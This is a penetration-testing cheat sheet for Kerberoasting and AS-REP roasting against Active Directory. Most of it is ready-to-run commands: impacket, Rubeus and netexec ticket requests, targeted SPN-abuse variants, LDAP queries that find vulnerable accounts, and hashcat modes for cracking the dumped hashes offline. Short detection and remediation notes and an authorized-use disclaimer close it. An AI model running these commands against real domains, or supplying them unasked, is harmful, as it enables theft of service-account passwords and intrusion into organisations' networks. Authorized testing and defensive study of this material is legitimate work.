KERBEROASTING
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
Interactive tool: Hash Identifier
OVERVIEW#
Kerberoasting requests service tickets (TGS) for accounts with an SPN and cracks the RC4/AES-encrypted portion offline to recover the service account password. AS-REP roasting targets accounts with Kerberos pre-authentication disabled. Both are technique references, distinct from the tooling sheets (RUBEUS/IMPACKET). Authorized use only.
KERBEROASTING - IMPACKET#
impacket-GetUserSPNs corp.lu/user:pass -dc-ip <dc>
# List SPN accounts
impacket-GetUserSPNs corp.lu/user:pass -dc-ip <dc> -request
# Request + dump hashes
impacket-GetUserSPNs corp.lu/user:pass -request -outputfile roast.txt
impacket-GetUserSPNs corp.lu/user:pass -request-user <svc>
# Target one account
# Kerberos-only auth (no NTLM), useful when passwords unknown:
impacket-GetUserSPNs -k -no-pass corp.lu/user -dc-ip <dc> -request
KERBEROASTING - RUBEUS (WINDOWS)#
Rubeus.exe kerberoast # Roast all SPN accounts Rubeus.exe kerberoast /outfile:roast.txt Rubeus.exe kerberoast /user:<svc> # Single account Rubeus.exe kerberoast /rc4opsec # Only accounts crackable via RC4 Rubeus.exe kerberoast /tgtdeleg # No creds needed (uses current) Rubeus.exe kerberoast /nowrap # Hash on one line
KERBEROASTING - NETEXEC#
nxc ldap <dc> -u user -p pass --kerberoasting roast.txt nxc ldap <dc> -u user -H <hash> --kerberoasting roast.txt
AS-REP ROASTING - IMPACKET#
impacket-GetNPUsers corp.lu/ -usersfile users.txt -dc-ip <dc>
# Test a user list (no creds)
impacket-GetNPUsers corp.lu/user:pass -request -format hashcat \
-outputfile asrep.txt
# Accounts with DONT_REQ_PREAUTH flag are vulnerable
AS-REP ROASTING - RUBEUS / NXC#
Rubeus.exe asreproast /outfile:asrep.txt Rubeus.exe asreproast /format:hashcat nxc ldap <dc> -u user -p pass --asreproast asrep.txt
TARGETED / ABUSE VARIANTS#
# Targeted Kerberoast: if you can set an SPN on a victim you control, # add one, roast it, then remove it (needs GenericWrite over victim): targetedKerberoast.py -v -d corp.lu -u user -p pass # AS-REP toggling: if GenericWrite, disable preauth then AS-REP roast
CRACKING (HASHCAT)#
# Kerberoast RC4 (etype 23): hashcat -m 13100 roast.txt rockyou.txt -r rules/best64.rule # Kerberoast AES256 (etype 18): hashcat -m 19700 roast.txt rockyou.txt # Kerberoast AES128 (etype 17): hashcat -m 19600 roast.txt rockyou.txt # AS-REP (etype 23): hashcat -m 18200 asrep.txt rockyou.txt # John equivalents: krb5tgs / krb5asrep formats
FIND TARGETS (LDAP)#
# SPN accounts (Kerberoastable): ldapsearch ... "(&(objectClass=user)(servicePrincipalName=*))" sAMAccountName # No-preauth accounts (AS-REP roastable): ldapsearch ... "(userAccountControl:1.2.840.113556.1.4.803:=4194304)"
EXAMPLES#
# Full Kerberoast with Kerberos auth and hashcat-ready output impacket-GetUserSPNs -k -no-pass corp.lu/user -dc-ip 10.0.0.1 \ -request -outputfile roast.txt hashcat -m 13100 roast.txt rockyou.txt -r rules/best64.rule # AS-REP hunt against a discovered user list, no credentials impacket-GetNPUsers corp.lu/ -usersfile users.txt -dc-ip 10.0.0.1 \ -format hashcat -outputfile asrep.txt # RC4-only opsec roast (avoids requesting AES where enforced) Rubeus.exe kerberoast /rc4opsec /nowrap /outfile:roast.txt
NOTES#
- Prefer AES targets only when needed; requesting RC4 for AES-capable accounts (etype downgrade) is a detection signal (Event 4769 rc4) - Service accounts with weak, non-rotated passwords are the risk; gMSA/dMSA accounts are effectively uncrackable (120+ char random) - AS-REP requires no valid credentials if you have a username list - Detection: 4769 with 0x17 (RC4) at volume, from a single host; 4768/4769 anomalies (see DETECTION-ENGINEERING.txt) - Remediation for FS clients: long random managed service accounts, enforce AES, monitor SPN accounts - maps to DORA ICT hardening